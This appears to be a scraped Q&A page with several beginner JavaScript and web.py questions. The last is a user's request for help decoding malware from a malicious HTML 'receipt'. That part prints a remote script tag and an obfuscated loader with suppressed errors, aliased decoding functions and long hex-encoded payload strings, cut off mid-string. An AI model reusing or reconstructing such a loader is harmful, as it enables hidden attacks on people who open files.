Hi I am starting with web.py and there are still plenty of things I do not understand.
This one is really annoying.
I try to do a simple page by using web.py and javascript.
The idea is to display a random value on a div which is updated every second by a python function.
This is the code I am using:
import web
import random
def rnd():
return random.randint(0, 10)
render = web.template.render('templates', globals={'rndm':rnd})
urls = (
'/mhs(.*)', 'mhs',
'/(.*)', 'index',
)
app = web.application(urls, globals())
class reloader:
def GET(self):
return render.reloader(rnd)
class index:
def GET(self, name='Bob'):
return render.index(name)
if __name__ == "__main__":
app = web.application(urls, globals())
app.run()
Then the reloader.html file:
$def with(rnd)
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
</head>
<body>
<div id='demo'>Status: ? </div>
<script type="text/javascript">
function UpdateLeds() {
var x = document.getElementById('demo');
x.innerHTML = "Status: $rndm()";
}
setInterval(UpdateLeds, 1000);
</script>
</body>
</html>
I expect the code to display a page with a random number in 0 to 10 refreshed every second.
However all I can get is a page which displays a static value (i.e: the first random number obtained by rnd).
However if I manually refresh the page, the value is updated as I expect.
I can't understand if the problem is in my code or in my understanding of the architecture. Can someone help me please?
If I change your javascript function to this, it works for me:
function UpdateLeds() {
var x = document.getElementById('demo');
var random = Math.floor((Math.random() * 10) + 1);
x.innerHTML = "Status: "+random;
}
I'm not sure exactly what you're trying to do with $def with(rnd) in your HTML. I think you might be mixing web.py python and javascript syntax (just a guess), but once the page gets rendered in the browser, the python isn't doing you any good, and you have to do what you want with pure javascript.
Here's a JSFiddle: https://jsfiddle.net/s7n6nxng/
Related
I'm practicing emailing and I wanted to know if it's possible to execute Javascript code when you send and email using smtplib and email libs, and when your message contain HTML code ?
It seem that nothing append.
HTML file :
<!DOCTYPE html>
<html lang="en">
<head>
</head>
<body>
</div>
<p class='Test'>This is my first sentence</p>
<script type="text/javascript">
var list = document.querySelector('p.Test');
list.innerHTML = "I want to change it";
</script>
</body>
</html>
Python Code:
import smtplib
from email.message import EmailMessage
def ConnectServer(User, Pass, Host):
SMTPServer = smtplib.SMTP_SSL(Host)
SMTPServer.ehlo()
SMTPServer.login(User, Pass)
return SMTPServer
def SendMail(Server, src, dst, data):
msg = EmailMessage()
msg['From'] = src
msg['To'] = dst
msg['Subject'] = 'Test envoi python'
msg.add_alternative(data, 'html')
Server.send_message(msg, src, dst)
def main():
#Define email adresses
me = 'AN_EMAIL#MAIL.com'
me2 = 'AN_OTHER_EMAIL#mail.com'
Server = ConnectServer(me, 'PASS', 'smtp.gmail.com')
with open('HTML PATH HERE', 'r', encoding='utf8') as File:
data = File.read()
SendMail(Server, me, me2, data)
pass
if __name__ == '__main__':
main()
I hope it's clear.
As far as i know we cant , i also tried to do this, i wanted to include a search bar for the table content in mail.
"No. JavaScript won't work in mails. A cool way to implement this feature
would be to include an image that points to your server, where you generate
the weather report server side and render it as an image, and return it to
the client.
Note though that Gmail caches images and depending on when he does it that
might not be refreshed."
Source : https://www.quora.com/
I'm pretty new to coding, and I'm trying to complete Codecademy's Javascript course. I've learned a little bit about HTML/CSS and I'm almost done with JavaScript. I've researched people having similar problems, but those solutions typically involve JQuery, which I haven't learned.
Here is my HTML (index.html):
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript" src="main.js"></script>
</head>
<body>
</body>
</html>
Here is the beginning of my JavaScript:
alert();
// Acquire character's name and check to make sure it's a string
var charName = prompt("NASA Receptionist: 'Welcome to Mission Control.
May I have your last name, please?'");
var nameCheck = function(charName) {
while (typeof charName === "number") {
charName = prompt("NASA Receptionist: 'Surely, your name is not
a number... Please, may I have your last name?'");
}
};
nameCheck(charName);
NOTE: index.html is in the same folder as main.js
When I open the index.html, nothing happens, not even the opening alert(). Am I missing something?
You have error in your script as you cannot make javascript statements in multiple lines without using escaping slash .
I was getting this error :
SyntaxError: unterminated string literal
var charName = prompt("NASA Receptionist: 'Welcome to Mission Control.
Here is the modified code :
alert();
// Acquire character's name and check to make sure it's a string
//The \r\n\ will format the string in prompt and make it appear in new line
var charName = prompt("NASA Receptionist: 'Welcome to Mission Control. \
\r\n\May I have your last name, please?'");
var nameCheck = function(charName) {
while (typeof charName === "number") {
charName = prompt("NASA Receptionist: 'Surely, your name is not \
\r\n\a number... Please, may I have your last name?'");
}
};
nameCheck(charName);
Check in browser source file whether main.js is loaded.
use alert("= loaded =") to check alert is called or not
If you are not even getting the syntax error, then I think you maybe referencing main.js incorrectly. Are you sure you have this in the same directory as index.html.
Also, each time I run it, the typeof method returns "string", no matter if I enter a number or not.
alert(typeof charName);
I'm learning Javascript for the first time, and using online tutorials from w3resource.com to help me understand the basics.
I see something happening in a tutorial that I don't understand, but I have no way to know whether the tutorial is misleading me or there's something I'm missing.
Basically, it's a small program to print out the date and time. I'm being shown the HTML and the JS so that I can see how it works. Based on what I've read about JS, the HTML requires a "script" tag so that it knows to incorporate the JS. However I don't see that tag being used in the tutorial. Does that mean the tutorial is misleading me as to what is proper protocol, or is there someway to embed JS in HTML without the "script" tag?
Here is what I am being shown:
HTML:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JavaScript current day and time</title>
</head>
<body>
</body>
</html>
Javascript:
var today = new Date();
var day = today.getDay();
var daylist = ["Sunday","Monday","Tuesday","Wednesday ","Thursday","Friday","Saturday"];
console.log("Today is : " + daylist[day] + ".");
var hour = today.getHours();
var minute = today.getMinutes();
var second = today.getSeconds();
var prepand = (hour >= 12)? " PM ":" AM ";
hour = (hour >= 12)? hour - 12: hour;
if (hour===0 && prepand===' PM ')
{
if (minute===0 && second===0)
{
hour=12;
prepand=' Noon';
}
else
{
hour=12;
prepand=' PM';
}
}
if (hour===0 && prepand===' AM ')
{
if (minute===0 && second===0)
{
hour=12;
prepand=' Midnight';
}
else
{
hour=12;
prepand=' AM';
}
}
console.log("Current Time : "+hour + prepand + " : " + minute + " : " + second);
This is the tutorial I am using: http://www.w3resource.com/javascript-exercises/javascript-basic-exercise-1.php
If anyone could explain to me how this JS is being embedded in the HTML without the tag I would appreciate it. I am going to be tested on this in person next week and I will be asked to write code from scratch, so I can't afford misunderstandings like this.
There's indeed a weird thing about this code. There's 3 ways to link JS and HTML :
Using the script tag :
<script> your script </script>
Write the JS in another file and link it to the HTML using :
<script type="text/javascript" src="yourFile.js"></script>
Incorporate it with events like :
<div onclick='alert('Hello')'>click here</div>
I just think that in the tutorial they are using something like JSBin to link the files or incorporate the JS part into the HTML as it would be on http://codepen.io/ for exemple.
I hope this will help you.
You are absolutely correct. HTML requires some indication of what is script and what is HTML. Script can be inline in a tag like this:
<script type="text/javascript">
var loc = window.location;
</script>
or without the type tag
<script>
var loc = window.location;
</script>
Notice, that in most cases, you do not need to specify the language, as the default is typically JS.
Additionally, you can use an external file (again, type is generally optional, but doesn't hurt to have in there):
<script type="text/javascript" src="/js/myScript.js"></script>
In the tutorial that you referenced, they skipped over the step of showing you where to put the js. This is often done because they want to let you decide whether you use it inline or in a separate file. In addition, many of those tools like JS Bin and such just show you the different types of content (css, js, html) without showing you how they link together. They also often skip the style tags and script tags for any framework dependencies as they are trying to keep it simple for the reader.
That said, if keeping it simple makes a user's life harder, perhaps something went slightly wrong in the design of the tutorial and the demo environments...
Hope this helps!
They are using JS Bin (which will insert the script element for you) to host the demo.
I recently got the "joy" of opening an HTML file that was similar to an expected receipt such that I opened the HTML file.
To which, part of the HTML pulled down a JavaScript from a non-descript site that has subsequently removed the content. I grabbed it via cURL before it was removed.
I know the message is encoded, and I am searching for a proper decoder to learn what impacts the JavaScript has had on my system. I have tried unsuccessfully to go to and from a variety of encodings to reveal the actual code. I would be most grateful for any assistance to determine what the impact was, or even just link to decode it myself.
To intentionally avoid having anyone's else be compromised, I am not going to post the entire HTML code, rather just two parts:
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="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" name="generator"/>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
and then (again, it is clearly not site.site)
<script src="http://site.site/script.php" type="text/javascript">
when I cURL'ed the php above, it came back with
window.onerror = function (errorMsg, url, lineNumber) {
return true;
};
OUQ = setTimeout;
Bpbo = String.fromCharCode;
dSR = parseInt;
BbcUcwd = function (a, b) {
return a.charAt(b);
};
var WGUNFs = '';
var EQRsXT = '6f39569db73a30c9bc4d132742876bbc72a8a51ce51fb31f2a184e746fbf8f9cf9556e7dff645a95af61440d108473d6a9af68475053fbd9937d03d90fe897e9871efa565257a9496986871b49b5f23a2bbd703edf9a97b8d27333f2b9b816e4340b59cffbcfebf8163c0941ba0cbe47eb45cbf2a4f7611e53d3ea3f34d55817f96b5464575de6831e08d4f8fb1ded7d5736f7ecb1638fac6e5b0f2721d9e0ccf703f1123f036dac68f0d773c684e80ab2db85fb2245fceba01904bc14ff20ef334f324ebdac82fe7c2991eb8cf22aac74b967fbb4ac3d2e37cf4727424e0d5564146bef776356734775b60e7191ac59eda477a30f0b8ade674f4544ea55c30ad71646408e4caddf38375695288de57d14d96a391526a5037778cac34a1fc3dfed7fe5bb5d996a39e3f091771202a9a35ecfcddfe251acd1e6627a938ea2e248cad277bc243b436eb6e505a9feb4bba9e61c64f785bd6437ed567f5af12218318decb4825a72dc74e80ec2d5c1f04a7e38c022af33d30ce4f001c78c02a52363b308a523364bd079a65ba4565000df191a63d86aa619742244e9c60fb6285954e0f3aa6589451a4813ea942098a12e114f34a5323b6b7ad46d3ff0bebb997f79ec04551b7b97a4991ff7bc2f41dd560d2922a41e37d4b5059101e92b3007d813a78065ee25b4500ff51ba3543b4d3457df04bedb3389ae199c7d51d5a5f625cedb20a2e0a6b23a66e4a162f0e6e6042fe0bebd295d39791981edac8de90a3d72b2ab4b7818d24464b4f7a74769a565fd94051c148c799a3ae9a53eefa1126a86edee9f40b5d20d8c4f76ff3c3f5422b157ad5099b00b87f392f73db91607f370040756fefb4f1bd304c7ff6d6a0b4e824d2062961e604f8535b4d7fdf0a26b3c6046613a692d9dd97c3e112ebb5937f5a127b1ca4284d0311b0480c9d26eafacae9f4d736656786404f71a14582f57cc0c7661bcbfbf7a9fb39ede127b4f2fe39c185c164d41e0f4761f1210fbcb151a8bc8e64ad93aef286640b93b1a32dcb824920715ee08ff0cdd5f29e7e3ec33f4b1bd29ee6429f02cf526a4bb10dffa041017660a595f9838b22d9256f216d30a25f8a00340385857cf92433e1c19ec1a6245556b6742c5d1680494f01806236a72723cfb2f871a2b07ec59ec76686547bb23e9093234b67b336cc927d873e5dc48b22ef85824dfccbfb10e12e055544c2301e12f086042e89834816641945f83fcec49a3ac566fb40374464733762f055ba31e3a4b3029f6b5019a2cb968b8dfa9a2e7fd4139344e21bb5078cae6b0f332bb4403abb2d150c3f2b3e4eab7d5214d99b82e37c946d7b0de44091a49b63411d51fcfea6021fcad1d569dc567b1a9e20b23eabb6b7f5940835502f0bb9d3d9945f77252c7937260cfebf2b0627cac70793ba379aae9433ae644f34251320e567abd68e8eab2cf743b9c820f2c2e5e931ea0247a0d239fbfaea57fb52a1ae79dad114c087d2fbff94244c0674e2da55ee40b6369b575497aea731548a8c610b8eee4adeb6b6c35523d06ba5215254f552552174521e311736a33077629d3b74dd51afe7aa87ba6fdb34e5624758329971422a3a4b4548d18d9060c67768c5703510446ba96b0f4bd97f887171d9f4461702d2efc3a1cb718dbcece4a3c80959de9687d4b361e7f5f2fa7b0d8c1cef05142a808aa14f400776d43c86ad1225ecae1030b65e949bff71e137fb86265454221011756ef1bc31ee4cc0b585e6f060c5f668325f174ad43e014aba067abd0133543785006179ffb6686ed3cf1c06f3b73b8d07f9291f02eb896397cb969e7baaefe8c88052041b3a5667d1b56b751150da1245b7e0911e23e8da5ec6f6107fca86aa7a80b791b1e145071218113b44f316d3fa2b988a75be27fa8d11e59cd2e2c96583d6de63ac90be7e67c99fb3d7f0444e18fed9350701e2b86be2c3dae0d9a1eafa856fc9834550c83f07f6018db95c87056edb61015b63b141274c2d062b93870e0a704623b18eb646cc245fa69a7c723d9b4bc81b0de19075a0ad3e222e0a54a1211031cf9339a2d6dd21252de085fe941f588210a196e17e15e27e9be60c0b14c38c652d07d53f77870b9abf4e7762be8faf5e61ecaabaab83bba4828ab6e0b17bc22b9dcf136ff85669ee224d156379c0cfdf287277e0cf02420f700acdbe0761949d395cb4e653b73296c1dd651ced70ff8a526c59336522e897279398eb40eed02ff3f0327d94dc6e45a48baa5c5cf39f5a864f755d5beefb90e4fefa1961f99210d9332f32d63457f802f144f0837b188cf1982d31f43f450836e1cb38a4067a21d0062d9b3f27be9f1c8893df3c5ce4a44ac5b23977574f0ed8219b5e684967a0d55dbab49ba406f97225ae34bfc5b4b2aacba77113f32f207d37aacd7d70d5fe177d06fd1fa78dd3d0abd6be5d7b733bb4313ef5e4ce964a3567a7105e8509e7bbe2319a8e2083fdaab1d376158bdfd851ab43692dc8e7cff8ab74e69285206a02556df03184db6cb173924f3a65c25ac076aa8f98da3e8959eb68349463945fb8040af6d6efa2170c17dae6358bcdec3f9abe3b34b415b3b196ee3e6291b00162e28c1ae3f6b31850b494c56d525ec3813aae8bcd9c1d42b2774d90e2ea01708f81556281e35c71d7618796bbe3528466ed046707b075c201ac5be3b48217cac874805b5eef6ca744e4e0cac08748b126fecafc9e4cded96fb35d1a7bf5b1c4dd5a4565f126ca7f3123f0ac047ac2c7aada628d3da6f0261323a40a2ac154aefb2e96e5c06174dbaf143ed29787e424ac37d7cefcf2ee488fd7eb791f230094635095700e80829a5730f1671f25027e1b327bf031e731370278fa441e679119fed2af6b6797e57aff516a568cfbdbe11adea6c746e26dbb0c1527d0f38c1706ba3637ff7d07bb3466724f2bb94abca6617c70c6ceefef8a0c3b92f7f7c6035560c6582b27703bed798587730413c1106053f7c6ce7f8488f371afeb8b61659efaf5b3718f30b7861bb657350695c14aa3fc1429cfbeb16f1080da707438cfe51f570caf6fdf5121c732731454772d69157f7ffdae742ed4d6b463dba7e4c0821aa25199e82a9ed83ec987e72bea8170c41c3a42397f100ebc946ac74d6c356c0f4a066312ec8b78a12f7d4c0c845ad070de49eb90ef47aa4ebc62f4f7b3313916c2b3fed5dccd3bd48cb00577a3827466df64b4707fd920b0b025d2cf665597abd0fcb625eb3bff6ac100a3d0165c63c1dd3eee72b2d11410cd6ae7a40b153d35435c44e358f6a42acfab66cbca85eb11297609d7bfed015c9068e094724334f944c7546f410b01f51387a1c6fdc7c671ce9cebc54a70f0d26f02f662c3a62b0ce861741ee53755970579b8cf194302ab5124bd092fd0078c0cd093100e8f92f0154e4122947636e3627073f230fc32a1a60e5a78335d88aeff748763d805562a655b4adf045ade8552ddb310c687b8fe8a7f4206777b712';
var NYUrVU = '661b7bc297614aa9df3b7c492faa11d51dd2cd7cbf70c47f48352d171fdfab9bdc7a4e5ee44926a19445663031a919b7decf5671383494b9bd156ec16d93da94b23cc9747f6b95665bb4bb8029c195130b871506bcbaaedcb70a55ccb79a3ac5162c7abb9dbfcf8e82493569d46aca6cb225c49a8fe14b3537b89f6e62b93e3fd2545e447882caa34183b58bdd74a243365c989add0be5d94338824544b2858da0689c7b547947910699aa12b0e3cd268cd2a7db0466dcd0d97c799d6b8f47d75c2e47309991a7901554accaaa8045d84fb647e0978e1e0f5bbc6d553b3a62344a66048e040b6b56770ad02c4c9f917ed2895885647da9ae173b2b24c93faa66b07e3280ac7fdea71f0d5db608b1c66039b91b1c6954dc6f1558a9b03b7babb2d35dd8cd26bb5235c6d3b5573727ccd472bec3bce224e0b7e16c5fb6b385c46abdb7089c4753311ec5d965c79fc4d7d08c6b4a93e5ca215b8a3b1a3885545b4ddd8ed4d13f21bc5ece66babaaed264270ca20fca5aa27f92b36cafe36ba32e44982c85081a32c41dd63ac2392930ba7e7226b514cc801d563aabbf5bda531c388f988649e6317a2836c3d015c7944c843d56db4b7c0e1dbd235adad4cbb6612387792b7355ae